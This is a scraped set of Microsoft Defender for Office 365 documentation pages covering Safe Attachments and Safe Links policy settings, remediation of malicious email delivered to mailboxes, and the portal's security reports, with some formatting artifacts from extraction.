-> The **Default in custom** column refers to the default values in new Safe Attachments policies that you create. The remaining columns indicate (unless otherwise noted) the values that are configured in the corresponding preset security policies.
-
-Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-The policy named AdminOnlyAccessPolicy enforces the historical capabilities for messages that were quarantined as malware as described in the table [here](quarantine-end-user.md).
-
-Users can't release their own messages that were quarantined as malware by Safe Attachments, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
-|Security feature name|Default in custom|Built-in protection|Standard|Strict|Comment|
-||::|::|::|::||
-|**Safe Attachments unknown malware response** (_Enable_ and _Action_)|**Off** (`-Enable $false` and `-Action Block`)|**Block** (`-Enable $true` and `-Action Block`)|**Block** (`-Enable $true` and `-Action Block`)|**Block** (`-Enable $true` and `-Action Block`)|When the _Enable_ parameter is $false, the value of the _Action_ parameter doesn't matter.|
-|**Quarantine policy** (_QuarantineTag_)|AdminOnlyAccessPolicy|AdminOnlyAccessPolicy|AdminOnlyAccessPolicy|AdminOnlyAccessPolicy||
-|**Redirect attachment with detected attachments** : **Enable redirect** (_Redirect_ and _RedirectAddress_)|Not selected and no email address specified. (`-Redirect $false` and _RedirectAddress_ is blank)|Not selected and no email address specified. (`-Redirect $false` and _RedirectAddress_ is blank)|Not selected and no email address specified. (`-Redirect $false` and _RedirectAddress_ is blank)|Not selected and no email address specified. (`-Redirect $false` and _RedirectAddress_ is blank)|Redirection of messages is available only when the **Safe Attachments unknown malware response** value is **Monitor** (`-Enable $true` and `-Action Allow`).|
-
-### Safe Links policy settings
-
-For more information about Safe Links protection, see [Safe Links in Defender for Office 365](safe-links-about.md).
-
-Although there's no default Safe Links policy, the **Built-in protection** preset security policy provides Safe Links protection to all recipients who aren't defined in the Standard preset security policy, the Strict preset security policy or in custom Safe Links policies. For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-To configure Safe Links policy settings, see [Set up Safe Links policies in Microsoft Defender for Office 365](safe-links-policies-configure.md).
-
-In PowerShell, you use the [New-SafeLinksPolicy](/powershell/module/exchange/new-safelinkspolicy) and [Set-SafeLinksPolicy](/powershell/module/exchange/set-safelinkspolicy) cmdlets for Safe Links policy settings.
-
-> [!NOTE]
-> The **Default in custom** column refers to the default values in new Safe Links policies that you create. The remaining columns indicate (unless otherwise noted) the values that are configured in the corresponding preset security policies.
-
-|Security feature name|Default in custom|Built-in protection|Standard|Strict|Comment|
-||::|::|::|::||
-|**URL & click protection settings**||||||
-|**Email**|||||The settings in this section affect URL rewriting and time of click protection in email messages.|
-|**On: Safe Links checks a list of known, malicious links when users click links in email. URLs are rewritten by default.** (_EnableSafeLinksForEmail_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Apply Safe Links to email messages sent within the organization** (_EnableForInternalSenders_)|Selected (`$true`)|Not selected (`$false`)|Selected (`$true`)|Selected (`$true`)||
-|**Apply real-time URL scanning for suspicious links and links that point to files** (_ScanUrls_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Wait for URL scanning to complete before delivering the message** (_DeliverMessageAfterScan_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Do not rewrite URLs, do checks via Safe Links API only** (_DisableURLRewrite_)|Selected (`$false`)<sup>\*</sup>|Selected (`$true`)|Not selected (`$false`)|Not selected (`$false`)|<sup>\*</sup> In new Safe Links policies that you create in the Defender portal, this setting is selected by default. In new Safe Links policies that you create in PowerShell, the default value of the _DisableURLRewrite_ parameter is `$false`.|
-|**Do not rewrite the following URLs in email** (_DoNotRewriteUrls_)|Blank|Blank|Blank|Blank|We have no specific recommendation for this setting. <br><br> **Note**: Entries in the "Don't rewrite the following URLs" list aren't scanned or wrapped by Safe Links during mail flow. Report the URL as **Should not have been blocked (False positive)** and select **Allow this URL** to add an allow entry to the Tenant Allow/Block List so the URL isn't scanned or wrapped by Safe Links during mail flow _and_ at time of click. For instructions, see [Report good URLs to Microsoft](submissions-admin.md#report-good-urls-to-microsoft).|
-|**Teams**|||||The setting in this section affects time of click protection in Microsoft Teams.|
-|**On: Safe Links checks a list of known, malicious links when users click links in Microsoft Teams. URLs are not rewritten.** (_EnableSafeLinksForTeams_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Office 365 apps**|||||The setting in this section affects time of click protection in Office apps.|
-|**On: Safe Links checks a list of known, malicious links when users click links in Microsoft Office apps. URLs are not rewritten.** (_EnableSafeLinksForOffice_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Use Safe Links in supported Office 365 desktop and mobile (iOS and Android) apps. For more information, see [Safe Links settings for Office apps](safe-links-about.md#safe-links-settings-for-office-apps).|
-|**Click protection settings**||||||
-|**Track user clicks** (_TrackClicks_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Let users click through to the original URL** (_AllowClickThrough_)|Selected (`$false`)<sup>\*</sup>|Selected (`$true`)|Not selected (`$false`)|Not selected (`$false`)|<sup>\*</sup> In new Safe Links policies that you create in the Defender portal, this setting is selected by default. In new Safe Links policies that you create in PowerShell, the default value of the _AllowClickThrough_ parameter is `$false`.|
-|**Display the organization branding on notification and warning pages** (_EnableOrganizationBranding_)|Not selected (`$false`)|Not selected (`$false`)|Not selected (`$false`)|Not selected (`$false`)|We have no specific recommendation for this setting. <br><br> Before you turn on this setting, you need to follow the instructions in [Customize the Microsoft 365 theme for your organization](/microsoft-365/admin/setup/customize-your-organization-theme) to upload your company logo.|
-|**Notification**||||||
-|**How would you like to notify your users?** (_CustomNotificationText_ and _UseTranslatedNotificationText_)|**Use the default notification text** (Blank and `$false`)|**Use the default notification text** (Blank and `$false`)|**Use the default notification text** (Blank and `$false`)|**Use the default notification text** (Blank and `$false`)|We have no specific recommendation for this setting. <br><br> You can select **Use custom notification text** (`-CustomNotificationText "<Custom text>"`) to enter and use customized notification text. If you specify custom text, you can also select **Use Microsoft Translator for automatic localization** (`-UseTranslatedNotificationText $true`) to automatically translate the text into the user's language.|
-
-## Related articles
--- Are you looking for best practices for **Exchange mail flow rules (also known as transport rules**)? See [Best practices for configuring mail flow rules in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/configuration-best-practices).--- Admins and users can submit false positives (good email marked as bad) and false negatives (bad email allowed) to Microsoft for analysis. For more information, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).--- **Security baselines for Windows** can be found here: [Where can I get the security baselines?](/windows/security/threat-protection/windows-security-baselines#where-can-i-get-the-security-baselines) for GPO/on-premises options, and [Use security baselines to configure Windows devices in Intune](/intune/protect/security-baselines) for Intune-based security. Finally, a comparison between Microsoft Defender for Endpoint and Microsoft Intune security baselines is available in [Compare the Microsoft Defender for Endpoint and the Windows Intune security baselines](/windows/security/threat-protection/microsoft-defender-atp/configure-machines-security-baseline#compare-the-microsoft-defender-atp-and-the-windows-intune-security-baselines).
security Remediate Malicious Email Delivered Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/remediate-malicious-email-delivered-office-365.md
- Title: Remediate malicious email that was delivered in Office 365------- m365-security-- tier1
- - NOCSH
-description: Threat remediation
- Previously updated : 1/16/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Remediate malicious email delivered in Office 365
--
-Remediation means to take a prescribed action against a threat. Malicious email sent to your organization can be cleaned up either by the system, through zero-hour auto purge (ZAP), or by security teams through remediation actions like *move to inbox*, *move to junk*, *move to deleted items*, *soft delete*, or *hard delete*. Microsoft Defender for Office 365 Plan 2/E5 enables security teams to remediate threats in email and collaboration functionality through manual and automated investigation.
-
-## What you need to know before you begin
--- You need to be assigned permissions before you can do the procedures in this article. Admins can take the required action on email messages, but the **Search and Purge** role is required to get those actions approved. To assign the **Search and Purge** role, you have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Email & collaboration advanced actions (manage)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Organization Management** or **Data Investigator** role groups. Or, you can [create a new role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) with the **Search and Purge** role assigned, and add the users to the custom role group.
--- Verify **Automated Investigation** is turned on at <https://security.microsoft.com/securitysettings/endpoints/integration>.-
-## Manual and automated remediation
-
-*Manual hunting* occurs when security teams identify threats manually by using the search and filtering capabilities in Explorer. Manual email remediation can be triggered through any email view (*Malware*, *Phish*, or *All email*) after you identify a set of emails that need to be remediated.
--
-Security teams can use Explorer to select emails in several ways:
--- Choose emails by hand: Use filters in various views. Select up to 100 emails to remediate.--- Query selection: Select an entire query by using the top **select all** button. The same query is also shown in action center mail submission details. Customers can submit maximum 200,000 emails from threat explorer.--- Query selection with exclusion: Sometimes security operations teams may want to remediate emails by selecting an entire query and excluding certain emails from the query manually. To do so, an admin can use the **Select all** check box and scroll down to exclude emails manually. The query can hold a maximum of 200,000 emails.-
-Once emails are selected through Explorer, you can start remediation by taking direct action or by queuing up emails for an action:
--- Direct approval: When actions like *move to inbox*, *move to junk*, *move to deleted items*, *soft delete*, or *hard delete* are selected by security personnel who have appropriate permissions, and the next steps in remediation are followed, the remediation process begins to execute the selected action.-
- > [!NOTE]
- > As the remediation gets kicked-off, it generates an alert and an investigation in parallel. Alert shows up in the alerts queue with the name "Administrative action submitted by an Administrator" suggesting that security personnel took the action of remediating an entity. It presents details like name of the person who performed the action, supporting investigation link, time etc. It works really well to know every time a harsh action like remediation is performed on entities. All these actions can be tracked under the **Actions & Submissions** \> **Action center** -> **History tab** (public preview).
--- Two-step approval: An "add to remediation" action can be taken by admins who don't have appropriate permissions or who need to wait to execute the action. In this case, the targeted emails are added to a remediation container. Approval is needed before the remediation is executed.-
-**Automated investigation and response** actions are triggered by alerts or by security operations teams from Explorer. These may include recommended remediation actions that must be approved by a security operations team. These actions are included on the **Action** tab in the automated investigation.
--
-All remediation (direct approvals) created in Explorer, Advanced hunting, or through Automated investigation are displayed in the Action center at **Actions & Submissions** \> **Action center** \> **History** tab (<https://security.microsoft.com/action-center/history>).
-
-Manual actions pending approval using the two-step approval process (1. Add to remediation by one security operation team member, 2. Reviewed and approved by another security operation team member) are visible at **Actions & Submissions** \> **Action center** \> **Pending** tab (<https://security.microsoft.com/action-center/pending>). After approval, they're visible at **Actions & Submissions** \> **Action center** \> **History** tab (<https://security.microsoft.com/action-center/history>).
--
-Unified Action Center shows remediation actions for the past 30 days. Actions taken through Explorer are listed by the name that the security operations team provided when the remediation was created as well as approval Id, Investigation Id. Actions taken through automated investigations have titles that begin with the related alert that triggered the investigation, such as *Zap email cluster*.
-
-Open any remediation item to view details about it, including its remediation name, approval Id, Investigation Id, creation date, description, status, action source, action type, decided by, status. It also opens a side pane with action details, email cluster details, alert and Incident details.
--- *Open Investigation page* this opens up an admin Investigation that contains fewer details and tabs. It shows details like: related alert, entity selected for remediation, action taken, remediation status, entity count, logs, approver of action. This investigation keeps a track of investigation done by the admin manually and contains details to selections made by the admin, hence is called admin action investigation. No need to act on the investigation and alert its already in approved state.-- *Email count* Displays the number of emails submitted through Threat Explorer. These emails can be actionable or not actionable.-- *Action logs* Show the details of remediation statuses like successful, failed, and already in destination.-
- :::image type="content" source="../../media/microsoft-365-defender-action-center-history-panel.png" lightbox="../../media/microsoft-365-defender-action-center-history-panel.png" alt-text="The Action Center with the Move to Inbox option open.":::
-
- - **Actionable**: Emails in the following cloud mailbox locations can be acted on and moved:
- - Inbox
- - Junk
- - Deleted folder
- - Soft-deleted folder
-
- > [!NOTE]
- > Currently, only a user with access to the mailbox can recover items from a soft-deleted folder.
-
- - **Not actionable**: Emails in the following locations can't be acted on or moved in remediation actions:
- - Quarantine
- - Hard-deleted folder
- - On-premises/external
- - Failed/dropped
- - Unknown
-
- - **Types of Move and Delete actions supported**:
- - **Move to junk folder**: Moves messages to the user's Junk Email folder.
- - **Move to inbox**: Moves messages to the users Inbox folder.
- - **Move to deleted items**: Moves messages to the user's Deleted Items folder.
- - **Soft delete**: Moves messages to a deleted folder in the cloud.
- - **Hard delete**: Permanently deletes the messages.
-
- Suspicious messages are categorized as either remediable or nonremediable. In most cases, remediable and nonremediable messages combine equals total messages submitted. But in rare cases this may not be true. This can happen because of system delays, timeouts, or expired messages. Messages expire based on the Explorer retention period for your organization.
-
- Unless you're remediating old messages after your organization's Explorer retention period, it's advisable to retry remediating items if you see number inconsistencies. For system delays, remediation updates are typically refreshed within a few hours.
-
- If your organization's retention period for email in Explorer is 30 days and you're remediating emails going back 29-30 days, mail submission counts may not always add up. The emails might have started moving out of the retention period already.
-
- If remediations are stuck in the "In progress" state for a while, it's likely due to system delays. It could take up to a few hours to remediate. You might see variations in mail submission counts, as some of the emails may not have been included the query at the start of remediation due to system delays. It's a good idea to retry remediating in such cases.
-
- > [!NOTE]
- > For best results, remediation should be done in batches of 50,000 or fewer.
-
- Only remediable emails are acted on during remediation. Nonremediable emails can't be remediated by the Office 365 email system, as they aren't stored in cloud mailboxes.
-
- Admins can take actions on emails in quarantine if necessary, but those emails expire out of quarantine if they're not manually purged. By default, emails quarantined because of malicious content aren't accessible by users, so security personnel don't have to take any action to get rid of threats in quarantine. If the emails are on-premises or external, the user can be contacted to address the suspicious email. Or the admins can use separate email server/security tools for removal. These emails can be identified by applying the *delivery location = on-prem* external filter in Explorer. For failed or dropped email, or email not accessible by users, there won't be any email to mitigate, since these mails don't reach the mailbox.
--- **Action logs**: This shows the messages remediated, successful, failed, already in destination.-
- Status can be:
-
- - **Started**: Remediation is triggered.
- - **Queued**: Remediation is queued up for mitigation of emails.
- - **In progress**: Mitigation is in progress.
- - **Completed**: Mitigation on all remediable emails either completed successfully or with some failures.
- - **Failed**: No remediations were successful.
-
- As only remediable emails can be acted on, each email's cleanup is shown as successful or failed. From the total remediable emails, successful and failed mitigations are reported.
-
- - **Success**: The desired action on remediable emails was accomplished. For example: An admin wants to remove emails from mailboxes, so the admin takes the action of soft-deleting emails. If a remediable email isn't found in the original folder after the action is taken, the status will show as successful.
-
- - **Failure**: The desired action on remediable emails failed. For example: An admin wants to remove emails from mailboxes, so the admin takes the action of soft-deleting emails. If a remediable email is still found in the mailbox after the action is taken, status will show as failed.
-
- - **Already in destination**: The desired action was already taken on the email OR the email already existed in the destination location. For example: An email was soft deleted by the admin through Explorer on day one. Then similar emails show up on day 2, which are again soft deleted by the admin. While selecting these emails, admin ends up picking some emails from day one that are already soft deleted. Now these emails won't be acted upon again, they'll just show as "already in destination", since no action was taken on them as they existed in the destination location.
-
- - **New**: An *Already in destination* column has been added in the Action Log. This feature uses the latest delivery location in Threat Explorer to signal if the mail has already been remediated. *Already in destination* helps security teams understand the total number of messages that still need to be addressed.
-
-Actions can only be taken on messages in Inbox, Junk, Deleted, and Soft Deleted folders of Threat Explorer. Here's an example of how the new column works. A *soft delete action* takes place on the message present in the Inbox, then the message is handled according to policies. The next time a soft delete is performed, this message will show under the column 'Already in destination' signaling it doesn't need to be addressed again.
-
-Select any item in the action log to display remediation details. If the details say "successful" or "not found in mailbox", that item was already removed from the mailbox. Sometimes there's a system error during remediation. In those cases, it's a good idea to retry the remediation action.
-
-In case of remediating large batches of email, export the messages sent for remediation via Mail Submission, and messages that were remediated via Action Logs. The export limit is increased to 100,000 records.
-
- Admins can take remediation actions like moving email messages to Junk, Inbox, or Deleted items folder and delete actions like soft deleted or hard delete from Advanced Hunting pages.
--
-Remediation mitigates threats, addresses suspicious emails, and helps keep an organization secure.
security Reports Defender For Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/reports-defender-for-office-365.md
- Title: View Defender for Office 365 reports
- - CSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-description: Admins can learn how to find and use the Defender for Office 365 reports that are available in the Microsoft Defender portal.
--- seo-marvel-apr2020- Previously updated : 3/7/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# View Defender for Office 365 reports in the Microsoft Defender portal
--
-In organizations with Microsoft Defender for Office 365 Plan 1 or Plan 2 (for example, Microsoft 365 E5 or Microsoft Business Premium) a variety of security-related reports are available. If you have the [necessary permissions](#what-permissions-are-needed-to-view-the-defender-for-office-365-reports), you can view and download these reports in the Microsoft Defender portal.
-
-The reports are available in the Microsoft Defender portal at <https://security.microsoft.com> on the **Email & collaboration reports** page at **Reports** \> **Email & collaboration** \> **Email & collaboration reports**. Or, to go directly to the **Email & collaboration reports** page, use <https://security.microsoft.com/emailandcollabreport>.
-
-Summary information for each report is available on the page. Identify the report you want to view, and then select **View details** for that report.
-
-The rest of this article describes the reports that are exclusive to Defender for Office 365.
-
-> [!NOTE]
->
-> Email security reports that don't require Defender for Office 365 are described in [View email security reports in the Microsoft Defender portal](reports-email-security.md).
->
-> For reports that have been deprecated or replaced, see the table in [Email security report changes in the Microsoft Defender portal](reports-email-security.md#email-security-report-changes-in-the-microsoft-defender-portal).
->
-> Reports that are related to mail flow are now in the Exchange admin center (EAC). For more information about these reports, see [Mail flow reports in the new Exchange admin center](/exchange/monitoring/mail-flow-reports/mail-flow-reports).
-
-Watch this short video to learn how you can use reports to understand the effectiveness of Defender for Office 365 in your organization.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWBkxB]
-
-## Safe Attachments file types report
-
-> [!NOTE]
-> This report has been deprecated. The same information is available in the [Threat protection status report](#threat-protection-status-report).
-
-## Safe Attachments message disposition report
-
-> [!NOTE]
-> This report has been deprecated. The same information is available in the [Threat protection status report](#threat-protection-status-report).
-
-## Mail latency report
-
-The **Mail latency report** shows you an aggregate view of the mail delivery and detonation latency experienced within your Defender for Office 365 organization. Mail delivery times in the service are affected by many factors, and the absolute delivery time in seconds is often not a good indicator of success or a problem. A slow delivery time on one day might be considered an average delivery time on another day, or vice-versa. This report tries to qualify message delivery based on statistical data about the observed delivery times of other messages.
-
-Client-side latency and network latency aren't included in the results.
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Mail latency report**, and then select **View details**. Or, to go directly to the report, use <https://security.microsoft.com/mailLatencyReport>.
--
-On the **Mail latency report** page, the following tabs are available:
--- **50th percentile**: The middle for message delivery times. You can consider this value as an average delivery time. This tab is selected by default.-- **90th percentile**: Indicates a high latency for message delivery. Only 10% of messages took longer than this value to deliver.-- **99th percentile**: Indicates the highest latency for message delivery.-
-Regardless of the tab you select, the chart shows messages organized into the following categories:
--- **Overall**-- **Detonation** (these values are explained in the :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** values)-
-Hover over a category in the chart to see a breakdown of the latency in each category.
--
-In the details table below the chart, the following information is available:
--- **Date (UTC)**-- **Latency**-- **Message count**-- **50th percentile**-- **90th percentile**-- **99th percentile**-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)**: **Start date** and **End date**-- **Message view**: Select one of tne of the following values:
- - **All email**
- - **Detonated email**: After you select this value, select one of the following values that appears:
- - **Inline detonation**: Links and attachments in messages are fully tested by Safe Links and Safe Attachments before delivery.
- - **Asynchronous detonation**: [Dynamic delivery](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies) of attachments by Safe Attachments and links in email tested by Safe Links after delivery.
-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Mail latency report** page, the :::image type="icon" source="../../medi#export-report-data)** action is available.
-
-## Post-delivery activities report
-
-The **Post-delivery activities** report shows information about email messages that removed from user mailboxes after delivery by zero-hour auto purge (ZAP). For more information about ZAP, see [Zero-hour auto purge (ZAP) in Exchange Online](zero-hour-auto-purge.md).
-
-The report shows real-time information with updated threat information.
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Post-delivery activities**, and then select **View details**. Or, to go directly to the report, use <https://security.microsoft.com/reports/ZapReport>.
--
-On the **Post-delivery activities** page, the chart shows the following information for the specified date range:
--- **No threat**: The number of unique delivered messages that were found to be not spam by ZAP.-- **Spam**: The number of unique messages that were removed from mailboxes by ZAP for spam.-- **Phishing**: The number of unique messages that were removed from mailboxes by ZAP for phishing.-- **Malware**: The number of unique messages that were removed from mailboxes by ZAP for phishing.-
-The details table below the graph shows the following information:
--- **Subject**-- **Received time**-- **Sender**-- **Recipient**-- **ZAP time**-- **Original threat**-- **Original location**-- **Updated threat**-- **Updated delivery location**-- **Detection technology**-
- To see all columns, you likely need to do one or more of the following steps:
-
- - Horizontally scroll in your web browser.
- - Narrow the width of appropriate columns.
- - Zoom out in your web browser.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)**: **Start date** and **End date**.-- **Updated threat**: Select one ore mor of the following values:
- - **No threat**
- - **Spam**
- - **Phishing**
- - **Malware**
-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Post delivery activities** page, the :::image type="icon" source="../../medi#export-report-data)** actions are available.
--
-## Threat protection status report
-
-The **Threat protection status** report is a single view that brings together information about malicious content and malicious email detected and blocked by [Exchange Online Protection](eop-about.md) (EOP) and Defender for Office 365. For more information, see [Threat protection status report](reports-email-security.md#threat-protection-status-report).
-
-## Top senders and recipients report
-
-The **Top senders and recipients** report show the top recipients for EOP and Defender for Office 365 protection features. For more information, see [Top senders and recipients report](reports-email-security.md#top-senders-and-recipients-report).
-
-## URL protection report
-
-The **URL protection report** provides summary and trend views for threats detected and actions taken on URL clicks as part of [Safe Links](safe-links-about.md). This report doesn't have click data from users if **Track user clicks** in the effective Safe Links policy isn't selected.
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **URL protection report**, and then select **View details**. Or, to go directly to the report, use <https://security.microsoft.com/URLProtectionActionReport>.
--
-The available views in the **URL threat protection** report are described in the following subsections.
-
-### View data by URL click protection action in the URL protection report
--
-The **View data by URL click protection action** view shows the number of URL clicks by users in the organization and the results of the click:
--- **Allowed**: Clicks allowed.-- **Allowed by tenant admin**: Clicks allowed in Safe Links policies.-- **Blocked**: Click blocked.-- **Blocked by tenant admin**: The Clicks blocked in Safe Links policies.-- **Blocked and clicked through**: Blocked clicks where users click through to the blocked URL.-- **Blocked by tenant admin and clicked through**: Admin has blocked the link, but the user clicked through.-- **Clicked through during scan**: Clicks where users click through the pending scan page to the URL.-- **Pending scan**: Clicks on URLs that are pending a scan verdict.-
-A click indicates that the user has clicked through the block page to the malicious website (admins can disable click through in Safe Links policies).
-
-The details table below the chart provides the following near-real-time view of all clicks that happened within the organization for the last 30 days:
--- **Click time**-- **User**-- **URL**-- **Action**-- **App**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)**: **Start date** and **End date**.-- **Action**: The same URL click protection actions as previously described. By default, **Allowed** and **Allowed by tenant admin** aren't selected.-- **Evaluation**: Select **Yes** or **No**. For more information, see [Try Microsoft Defender for Office 365](try-microsoft-defender-for-office-365.md).-- **Domains (separated by commas)**: The URL domains listed in the report results.-- **Recipients (separated by commas)**-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **URL threat protection** page, the :::image type="icon" source="../../medi#export-report-data)** actions are available.
-
-### View data by URL click by application in the URL protection report
--
-> [!TIP]
-> URL clicks by guest users are available in the report. Guest user accounts might be compromised or access malicious content inside the organization.
-
-The **View data by URL click by application** view shows the number of URL clicks by apps that support Safe Links:
--- **Email client**-- **Teams**-- **Office document**-
-The details table below the chart provides the following near-real-time view of all clicks that happened within the organization for the last seven days:
--- **Click time**-- **User**-- **URL**-- **Action**: The same URL click protection actions as previously described for the [View data by URL click protection action](#view-data-by-url-click-protection-action-in-the-url-protection-report) view.-- **App**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report and the details table by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)**: **Start date** and **End date**.-- **Application**: The same click by application values as previously described.-- **Action**: The same values as shown in the [View data by URL click protection action view](#view-data-by-url-click-protection-action-in-the-url-protection-report). By default, **Allowed** and **Allowed by tenant admin** aren't selected.-- **Evaluation**: Select **Yes** or **No**. For more information, see [Try Microsoft Defender for Office 365](try-microsoft-defender-for-office-365.md).-- **Domains (separated by commas)**: The URL domains listed in the report results.-- **Recipients (separated by commas)**-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **URL threat protection** page, the :::image type="icon" source="../../medi#export-report-data)** actions are available.
-
-## Additional reports to view
-
-In addition to the reports described in this article, the following tables describe other available reports that are available:
-
-|Report|Article|
-|||
-|**Explorer** (Microsoft Defender for Office 365 Plan 2) or **real-time detections** (Microsoft Defender for Office 365 Plan 1)|[Threat Explorer (and real-time detections)](threat-explorer-real-time-detections-about.md)|
-|Email security reports that don't require Defender for Office 365|[View email security reports in the Microsoft Defender portal](reports-email-security.md)|
-|Mail flow reports in the Exchange admin center (EAC)|[Mail flow reports in the new Exchange admin center](/exchange/monitoring/mail-flow-reports/mail-flow-reports)|
-
-PowerShell reporting cmdlets:
-
-|Report|Article|
-|||
-|Top senders and recipients|[Get-MailTrafficSummaryReport](/powershell/module/exchange/get-mailtrafficsummaryreport)|
-|Top malware|[Get-MailTrafficSummaryReport](/powershell/module/exchange/get-mailtrafficsummaryreport)|
-|Threat protection status|[Get-MailTrafficATPReport](/powershell/module/exchange/get-mailtrafficatpreport) <p> [Get-MailDetailATPReport](/powershell/module/exchange/get-maildetailatpreport)|
-|Safe Links|[Get-SafeLinksAggregateReport](/powershell/module/exchange/get-safelinksaggregatereport) <p> [Get-SafeLinksDetailReport](/powershell/module/exchange/get-safelinksdetailreport)|
-|Compromised users|[Get-CompromisedUserAggregateReport](/powershell/module/exchange/get-compromiseduseraggregatereport) <p> [Get-CompromisedUserDetailReport](/powershell/module/exchange/get-compromiseduserdetailreport)|
-|Mail flow status|[Get-MailflowStatusReport](/powershell/module/exchange/get-mailflowstatusreport)|
-|Spoofed users|[Get-SpoofMailReport](/powershell/module/exchange/get-spoofmailreport)|
-|Post delivery activity summary|[Get-AggregateZapReport](/powershell/module/exchange/get-aggregatezapreport)|
-|Post delivery activity details|[Get-DetailZapReport](/powershell/module/exchange/get-detailzapreport)|
-
-## What permissions are needed to view the Defender for Office 365 reports?
-
-See [What permissions are needed to view these reports?](reports-email-security.md#what-permissions-are-needed-to-view-these-reports)
-
-## What if the reports aren't showing data?
-
-If you don't see data in the reports, check the report filters and double-check that your policies are set up correctly. Safe Links policies and Safe Attachments policies from Built-in protection, preset security policies, or custom policies need to be in effect and acting on messages. For more information, see the following articles:
--- [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md)-- [Configuration analyzer for protection policies in EOP and Microsoft Defender for Office 365](configuration-analyzer-for-security-policies.md)-- [Set up Safe Links policies in Microsoft Defender for Office 365](safe-links-policies-configure.md)-- [Set up Safe Attachments policies in Microsoft Defender for Office 365](safe-attachments-policies-configure.md)
security Reports Email Security https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/reports-email-security.md
- Title: View email security reports
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-description: "Admins can learn how to find and use the email security reports that are available in the Microsoft Defender portal. This article helps answer the question, 'What is the Threat protection status report in EOP and Microsoft Defender for Office 365?'"
--- seo-marvel-apr2020- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# View email security reports in the Microsoft Defender portal
--
